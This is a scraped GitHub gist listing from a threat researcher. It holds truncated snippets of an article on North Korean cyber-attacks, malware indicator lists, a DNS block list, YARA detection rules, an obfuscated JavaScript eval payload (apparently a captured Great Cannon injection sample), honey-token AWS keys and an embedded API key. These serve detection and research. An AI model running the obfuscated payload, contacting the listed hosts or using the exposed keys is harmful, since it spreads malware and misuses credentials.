chrisdoman
chrisdoman
/ North Korean Cyber-Attacks and Collateral Damage.txt
Created
January 19, 2024 19:55
North Korean Cyber-Attacks and Collateral Damage
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| North Korean Cyber-Attacks and Collateral Damage | |
| February 15, 2018 | Chris Doman | |
| WannaCry was incredibly destructive. The attackers made about $150,000 - but the total damage caused by WannaCry has been estimated in the billions of dollars. | |
| There is strong evidence linking WannaCry to a group of hackers known as ‘Lazarus’, reportedly operating out of the DPRK (North Korea). Whilst WannaCry is perhaps the most famous attack by Lazarus, it isn’t the only ‘collateral damage’ caused by the DPRK’s cyber actions. | |
| Below we disclose new details on three attacks that have spread out of control. Two likely originating from the DPRK - and one targeting the DPRK. | |
| The Voice of Korea and the Rivts Virus | |
| This section describes a piece of malware that may have been created within the DPRK as part of a test project - and accidentally leaked out onto the wider internet. |
chrisdoman
/ cado_lambda.py
Created
February 2, 2022 11:56
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import json | |
| import urllib3 | |
| import requests | |
| import datetime | |
| import random | |
| import string | |
| import logging | |
| def lambda_handler(event, context): |
We can't make this file beautiful and searchable because it's too large.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| indicator,indicator_type,pulse_title,pulse_author,tlp | |
| ihracat.myq-see.com,hostname,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white | |
| phantom101.duckdns.org,hostname,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white | |
| goodattack.duckdns.org,hostname,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white | |
| http://www.tempinfo.96.lt/wras/savekey.php,url,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white | |
| http://www.tempinfo.96.lt/wras/createkeys.php,url,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white | |
| http://www.tempinfo.96.lt/wras/RANSOM20.jpg,url,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white | |
| www.tempinfo.96.lt,hostname,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white | |
| 2779863a173ff975148cb3156ee593cb5719a0ab238ea7c9e0b0ca3b5a4a9326,file,Multiple covid-19 related malware threats - March 25t/26h,AlienVault,white | |
| 62d38f19e67013ce7b2a84cb17362c77e2 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [default] | |
| aws_access_key_id = AKIAXYZDQCENYTNALZP5 | |
| aws_secret_access_key = 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 | |
| output = json | |
| region = us-east-2 | |
| * This is just a honey token to detect automated scanners looking for AWS keys - this is not a real AWS account! * |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| differentia.ru CNAME . | |
| *.differentia.ru CNAME . | |
| disorderstatus.ru CNAME . | |
| *.disorderstatus.ru CNAME . | |
| gvaq70s7he.ru CNAME . | |
| *.gvaq70s7he.ru CNAME . | |
| atomictrivia.ru CNAME . | |
| *.atomictrivia.ru CNAME . | |
| 4nbizac8.ru CNAME . | |
| *.4nbizac8.ru CNAME . |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Short demonstration script to write OTX hostnames to a RPZ format text-file | |
| from OTXv2 import OTXv2 | |
| import os | |
| # This is the API key for the user "api_example" | |
| otx = OTXv2('766ba1df3ab54db9c0fcbf62ef048c3a04c260e8ca65b6c25346084b7b4719ad') | |
| events = otx.get_all_indicators(author_name='alienvault') | |
| output = '' |
chrisdoman
/ cannon.rule
Created
September 2, 2019 17:32
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rule hunt_great_cannon { | |
| strings: | |
| $ = "requesttime_list" nocase wide ascii | |
| $ = "responsetime_list" nocase wide ascii | |
| $ = "cloudflare_js_validate_url" nocase wide ascii | |
| $ = "116.255.226.154" nocase wide ascii | |
| $ = "responsetime-requesttime>TIMEGAP" nocase wide ascii | |
| condition: | |
| any of them | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var _a="(,& vXh)C;sf<H8O1J|iRY9dj?G%m4}n_M'pQZkFyaEP=Ko2/\\x]!cquSV.57B^lW*Utr{z+N-ADg>[we0b\"I6:TL3",_b="^JL,qMP(*IjReDE<xiQYo{tp>8!-[W&hOcbv12Fn\".%4Ks=5 Z]Cl'uXfAHrdGaN/9}zg\\+U6|kSV:;wmyB7T)_03?",_c="DjOx.}S=Q's_\"I:]c[E(g/JG)k!2yY,zBV4>PFu9rp;N1i<%ZUM*?0K5^nX 8td{LAmH6hbolv&\\a7-ReCq|fw+3TW";eval(function(_,b,a,c,n,r){if(n=function(_){return(_<62?"":n(parseInt(_/62)))+((_%=62)>35?String[_a[11]+_c[40]+_b[20]+_c[66]+_b[51]+_a[6]+_b[62]+_c[40]+_b[51]+_b[20]+_c[62]+_b[12]](_+29):_[_c[61]+_c[71]+_a[56]+_c[61]+_a[68]+_a[19]+_c[57]+_b[68]](36))},0==_a[81][_a[68]+_b[12]+_b[23]+_b[52]+_b[62]+_a[53]+_c[80]](0,n)){for(;a--;)r[n(a)]=c[a];c=[function(_){return r[_]||_}],n=function(){return _c[17]+_c[27]+_b[27]+_a[22]+_a[82]+_b[33]+_c[80]+_a[73]+_a[10]+_a[55]+_c[78]+_a[70]+_a[74]+_c[78]+_a[37]+_c[15]},a=1}for(;a--;)c[a]&&(_=_[_c[40]+_a[80]+_b[23]+_b[52]+_b[62]+_a[53]+_b[12]](new RegExp(_a[49]+_a[82]+n(a)+(_b[69]+_a[82]),_a[76]),c[a]));return _}(_c[27]+_c[59]+_b[84]+_c[65]+_b[75]+_a[45]+_b[9]+_c[0]+_a[44]+_a[89]+_b[88] |
chrisdoman
/ getUrlScanGreatCannonHits.py
Created
September 2, 2019 16:53
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ''' | |
| Gets possible Great Cannon injections from UrlScan | |
| ''' | |
| import requests | |
| import json | |
| # Insert your urlscan API Key | |
| api_key = '' |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| Yara rules to identify malware families, made by Yabin | |
| Auto-generated - plenty of these rules won't work as they rely on looking for compiled code | |
| */ | |
| rule BackdoorAndroidOSCoca_51dc097980b46d053085ff079b153f107d866a27dc19670b79928ec55ab336d7 { | |
| strings: | |
| $a_2 = { 558bebdcdb73a5fdef349bc5b2931e67 } |
NewerOlder